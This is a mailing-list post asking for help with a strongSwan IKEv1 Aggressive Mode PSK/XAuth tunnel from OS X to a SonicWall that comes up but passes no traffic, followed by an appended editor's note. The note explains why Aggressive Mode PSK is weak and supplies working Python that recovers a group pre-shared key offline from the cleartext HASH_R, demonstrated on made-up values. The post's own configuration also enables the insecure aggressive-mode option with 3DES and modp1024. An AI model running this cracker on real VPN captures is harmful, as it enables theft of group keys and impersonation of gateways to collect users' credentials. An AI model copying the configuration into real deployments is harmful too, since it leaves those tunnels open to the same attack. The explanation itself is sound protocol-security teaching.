<div dir="ltr"><div class="gmail_default" style="font-family:'courier new',monospace">Hello,</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">This is my first message to the list ;-)</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">My setup:</div><div class="gmail_default" style="font-family:'courier new',monospace">VPN Server: SonicWall NSA E5500 "WAN Group VPN"</div><div class="gmail_default" style="font-family:'courier new',monospace">Previously I made it work with CentOS 6 and yum install strongswan; all fine with a weakswan conn.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">Now I am trying the same conn with OS X 10.10 Yosemite, just to act as a roadwarrior against the same VPN Server:</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace">brew install strongswan --with-curl --with-suite-b</div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">in charon.conf:</div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace">i_dont_care_about_security_and_use_aggressive_mode_psk = yes</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace">I'll obfuscate some info...</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default"
style="font-family:'courier new',monospace">$ cat ipsec.conf</div><div class="gmail_default" style="font-family:'courier new',monospace">config setup</div><div class="gmail_default" style="font-family:'courier new',monospace">conn gandia12<br></div><div class="gmail_default"><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>auto=add</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>type=tunnel</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>aggressive=yes</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>keyexchange=ikev1</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">left=%defaultroute</span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">leftauth=psk</span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>leftid=GroupVPN</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>leftauth2=xauth</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>xauth=client</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>xauth_identity=user</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">right=<a 
href="http://host.domain.com">host.domain.com</a></span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>rightid=SNW UNIQ ID</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>rightsubnet="<a href="http://192.168.12.0/24">192.168.12.0/24</a>"</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>rightauth=psk</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">keyingtries=1</span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>ike=3des-sha1-modp1024</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>ikelifetime=28800s</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>esp=3des-sha1</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>lifetime=28800s</font></div></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">$ cat ipsec.secrets</div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">"GroupVPN" "SNW UNIQ ID" : PSK "Secret;-)"</div><div class="gmail_default">user : XAUTH "p@w0rd;-)"</div></div></blockquote><font face="courier new, monospace"><div><div><br></div><div>$ sudo ipsec start</div><div>Starting weakSwan 5.2.2 IPsec [starter]...</div><div>no netkey IPsec stack detected</div><div>no KLIPS IPsec stack detected</div><div>no known IPsec stack 
detected, ignoring!</div></div></font><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">$ sudo ipsec up gandia12</div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">ULISESXXI:etc alexval$ sudo ipsec up gandia12</div><div class="gmail_default">initiating Aggressive Mode IKE_SA gandia12[1] to 94.127.192.243</div><div class="gmail_default">generating AGGRESSIVE request 0 [ SA KE No ID V V V V ]</div><div class="gmail_default">sending packet: from 192.168.2.15[500] to destip[500] (396 bytes)</div><div class="gmail_default">received packet: from destip[500] to 192.168.2.15[500] (405 bytes)</div><div class="gmail_default">parsed AGGRESSIVE response 0 [ SA KE No ID V V V NAT-D NAT-D V V HASH ]</div><div class="gmail_default">received unknown vendor ID: 40:4b:f4:39:52:2c:a3:f6</div><div class="gmail_default">received unknown vendor ID: 5b:36:2b:c8:20:f6:00:08</div><div class="gmail_default">received NAT-T (RFC 3947) vendor ID</div><div class="gmail_default">received DPD vendor ID</div><div class="gmail_default">received XAuth vendor ID</div><div class="gmail_default">local host is behind NAT, sending keep alives</div><div class="gmail_default">generating AGGRESSIVE request 0 [ NAT-D NAT-D HASH ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (108 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (76 bytes)</div><div class="gmail_default">parsed TRANSACTION request 4014275289 [ HASH CPRQ(X_TYPE X_USER X_PWD) ]</div><div class="gmail_default">generating TRANSACTION response 4014275289 [ HASH CPRP(X_USER X_PWD) ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (92 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (84 bytes)</div><div 
class="gmail_default">parsed INFORMATIONAL_V1 request 2418823313 [ HASH N(INITIAL_CONTACT) ]</div><div class="gmail_default">configuration payload missing in XAuth request</div><div class="gmail_default">establishing connection 'gandia12' failed</div><div class="gmail_default"><br></div><div class="gmail_default">ULISESXXI:etc alexval$ sudo ipsec up gandia12</div><div class="gmail_default">initiating Aggressive Mode IKE_SA gandia12[2] to destip</div><div class="gmail_default">generating AGGRESSIVE request 0 [ SA KE No ID V V V V ]</div><div class="gmail_default">sending packet: from 192.168.2.15[500] to destip[500] (396 bytes)</div><div class="gmail_default">received packet: from destip[500] to 192.168.2.15[500] (405 bytes)</div><div class="gmail_default">parsed AGGRESSIVE response 0 [ SA KE No ID V V V NAT-D NAT-D V V HASH ]</div><div class="gmail_default">received unknown vendor ID: 40:4b:f4:39:52:2c:a3:f6</div><div class="gmail_default">received unknown vendor ID: 5b:36:2b:c8:20:f6:00:08</div><div class="gmail_default">received NAT-T (RFC 3947) vendor ID</div><div class="gmail_default">received DPD vendor ID</div><div class="gmail_default">received XAuth vendor ID</div><div class="gmail_default">local host is behind NAT, sending keep alives</div><div class="gmail_default">generating AGGRESSIVE request 0 [ NAT-D NAT-D HASH ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (108 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (76 bytes)</div><div class="gmail_default">parsed TRANSACTION request 1102551187 [ HASH CPRQ(X_TYPE X_USER X_PWD) ]</div><div class="gmail_default">generating TRANSACTION response 1102551187 [ HASH CPRP(X_USER X_PWD) ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (92 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (68 bytes)</div><div class="gmail_default">parsed 
TRANSACTION request 3574825738 [ HASH CPS(X_STATUS) ]</div><div class="gmail_default">XAuth authentication of 'user' (myself) successful</div><div class="gmail_default">IKE_SA gandia12[2] established between 192.168.2.15[GroupVPN]...destip[SNW UNIQ ID]</div><div class="gmail_default">scheduling reauthentication in 28124s</div><div class="gmail_default">maximum IKE_SA lifetime 28664s</div><div class="gmail_default">generating TRANSACTION response 3574825738 [ HASH CPA(X_STATUS) ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (68 bytes)</div><div class="gmail_default">generating QUICK_MODE request 1778390774 [ HASH SA No ID ID ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (196 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (156 bytes)</div><div class="gmail_default">parsed QUICK_MODE response 1778390774 [ HASH SA No ID ID ]</div><div class="gmail_default">CHILD_SA gandia12{1} established with SPIs 75525fbd_i 42f23025_o and TS <a href="http://192.168.2.15/32">192.168.2.15/32</a> === <a href="http://192.168.12.0/24">192.168.12.0/24</a> </div><div class="gmail_default">connection 'gandia12' established successfully</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">The tunnel is established OK, always on the second try; the SonicWall asks twice for the username and password.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">The tunnel interface utun0 gets created:</div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 02:55:57 ULISESXXI kernel[0]: utun_ctl_connect: creating interface utun0</div></div><div
class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 02:55:57 ULISESXXI.local charon[22124]: 00[LIB] created TUN device: utun0</div></div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default"><br></div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">$ ifconfig</div><div class="gmail_default">lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>options=3<RXCSUM,TXCSUM></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet6 ::1 prefixlen 128 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet 127.0.0.1 netmask 0xff000000 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>nd6 options=1<PERFORMNUD></div><div class="gmail_default">gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280</div><div class="gmail_default">stf0: flags=0<> mtu 1280</div><div class="gmail_default">en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>options=4<VLAN_MTU></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>ether b8:8d:12:55:d6:ba </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet6 fe80::ba8d:12ff:fe55:d6ba%en1 prefixlen 64 scopeid 0x4 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet 192.168.2.15 netmask 0xffffff00 broadcast 192.168.2.255</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>nd6 options=1<PERFORMNUD></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>media: autoselect (100baseTX 
<full-duplex,flow-control>)</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>status: active</div><div class="gmail_default">en0: flags=8823<UP,BROADCAST,SMART,SIMPLEX,MULTICAST> mtu 1500</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>ether 44:2a:60:f5:bf:44 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>nd6 options=1<PERFORMNUD></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>media: autoselect (<unknown type>)</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>status: inactive</div><div class="gmail_default">p2p0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2304</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>ether 06:2a:60:f5:bf:44 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>media: autoselect</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>status: inactive</div><div class="gmail_default">utun0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1400</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">But once established, no packets are arriving at the VPN Server.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace">$ setkey -D</div><div class="gmail_default" style="font-family:'courier new',monospace">pfkey_open: No such file or directory</div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">The only error found in the log is when $ ipsec
stop:</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><blockquote style="margin:0 0 0 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[DMN] signal of type SIGINT received. Shutting down</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI kernel[0]: SIOCPROTODETACH_IN6: utun0 error=6</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[ESP] flushing policies</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[ESP] flushing SAD</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[ESP] flushing allocated SPIs</div></div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">Please, I ask for your valuable help.
What can I double-check?</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">Thanks.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div><div class="gmail_signature"><div dir="ltr"><div><font face="courier new, monospace">--</font></div><div><font face="courier new, monospace">Alejandro Valcarcel Garcia<br>Systems and communications manager<br>ODEC - We Build Solutions<br><br><a href="mailto:avalcarcel@odec.es" target="_blank">avalcarcel@odec.es</a> - <a href="http://www.odec.es" target="_blank">http://www.odec.es</a> - Calle Vicent Macip, 1 (46701) Gandia SPAIN - T: +34 962 860 466 ext 1292 - M: +34 699 679 435</font></div></div></div></div>
</div>
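<p>Editor's note, added after the message above; this is not code from the original post, from the poster, or from strongSwan. The charon.conf option the post enables, <code>i_dont_care_about_security_and_use_aggressive_mode_psk</code>, is named that way because in IKEv1 Aggressive Mode with pre-shared-key authentication the gateway's HASH_R payload travels unencrypted in the second message (visible in the log above as <code>parsed AGGRESSIVE response 0 [ SA KE No ID V V V NAT-D NAT-D V V HASH ]</code>), and every other input to HASH_R (both cookies, both nonces, both DH public values, the initiator's SA payload body and the responder's ID payload body) is on the wire in the clear as well. A passive observer can therefore run an offline dictionary attack on the group PSK. The Python below computes HASH_R as RFC 2409 section 5 specifies for PSK authentication, with HMAC-SHA1 as the prf to match <code>ike=3des-sha1-modp1024</code>, and recovers the key from a constructed capture. The cookies, nonces, DH values, SA body, ID payload, PSK and wordlist are all made-up values for the demo; nothing is taken from the post.</p>

```python
"""IKEv1 Aggressive Mode + PSK: offline dictionary attack on the cleartext HASH_R.

Added example, not code from the original post or from strongSwan. The
formulas are RFC 2409 section 5 (pre-shared key authentication); every byte
value below is constructed for the demo and stands in for a packet capture.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple


@dataclass(frozen=True)
class Phase1Cleartext:
    """What a passive observer reads from the two unencrypted Aggressive Mode
    messages: [ SA KE No ID ] from the initiator, [ SA KE No ID ... HASH ]
    from the responder (compare the 'parsed AGGRESSIVE response' log line)."""
    cky_i: bytes            # initiator cookie, ISAKMP header of message 1
    cky_r: bytes            # responder cookie, ISAKMP header of message 2
    sa_i_b: bytes           # body of the initiator's SA payload, message 1
    g_xi: bytes             # initiator DH public value, KE payload, message 1
    g_xr: bytes             # responder DH public value, KE payload, message 2
    n_i: bytes              # initiator nonce, message 1
    n_r: bytes              # responder nonce, message 2
    id_r_b: bytes           # body of the responder's ID payload, message 2
    hash_alg: str = "sha1"  # negotiated hash: ike=3des-sha1-modp1024 -> HMAC-SHA1 prf


def prf(key: bytes, data: bytes, hash_alg: str) -> bytes:
    """RFC 2409 prf: HMAC keyed with the negotiated hash algorithm."""
    return hmac.new(key, data, getattr(hashlib, hash_alg)).digest()


def responder_hash(psk: bytes, x: Phase1Cleartext) -> bytes:
    """HASH_R exactly as the gateway computes it (RFC 2409 section 5):
         SKEYID = prf(PSK, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    The PSK is the only input that is not visible on the wire."""
    skeyid = prf(psk, x.n_i + x.n_r, x.hash_alg)
    return prf(skeyid, x.g_xr + x.g_xi + x.cky_r + x.cky_i + x.sa_i_b + x.id_r_b, x.hash_alg)


def crack_psk(x: Phase1Cleartext, observed_hash_r: bytes,
              candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R per candidate and compare.
    No packet is sent to the gateway, so server-side lockouts never trigger."""
    for psk in candidates:
        if hmac.compare_digest(responder_hash(psk, x), observed_hash_r):
            return psk
    return None


def _fake(label: str, n: int) -> bytes:
    """Deterministic filler standing in for captured bytes (constructed data)."""
    out = b""
    while len(out) < n:
        out += hashlib.sha256(label.encode() + len(out).to_bytes(2, "big")).digest()
    return out[:n]


def constructed_capture(gateway_psk: bytes) -> Tuple[Phase1Cleartext, bytes]:
    """A made-up Aggressive Mode capture with realistic sizes: 8-byte cookies,
    128-byte modp1024 public values, and an ID payload body of type ID_KEY_ID
    (11) carrying an invented key id in place of the gateway's unique ID."""
    x = Phase1Cleartext(
        cky_i=_fake("cky_i", 8), cky_r=_fake("cky_r", 8),
        sa_i_b=_fake("sa_i_b", 56),
        g_xi=_fake("g_xi", 128), g_xr=_fake("g_xr", 128),
        n_i=_fake("n_i", 32), n_r=_fake("n_r", 32),
        id_r_b=bytes([11, 0, 0, 0]) + b"gateway-key-id",
    )
    hash_r_on_wire = responder_hash(gateway_psk, x)  # sent unencrypted by the gateway
    return x, hash_r_on_wire


CONSTRUCTED_PSK = b"GroupVPN2015"  # invented group secret for the demo
CONSTRUCTED_WORDLIST = [b"password", b"sonicwall", b"GroupVPN", b"GroupVPN2015", b"letmein"]


def demo() -> Optional[bytes]:
    """Observe one exchange, then recover the PSK without touching the gateway."""
    x, hash_r_on_wire = constructed_capture(CONSTRUCTED_PSK)
    return crack_psk(x, hash_r_on_wire, CONSTRUCTED_WORDLIST)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

<p>In Main Mode the same HASH_R is carried in message 6, which is already encrypted under keys derived from the Diffie-Hellman exchange, so this attack has no target there. Combined with the fact that a GroupVPN pre-shared key is shared by every roadwarrior, that is why strongSwan refuses Aggressive Mode with PSK unless the option above is set: whoever recovers the group key can also pose as the gateway toward other clients and collect their XAuth credentials.</p>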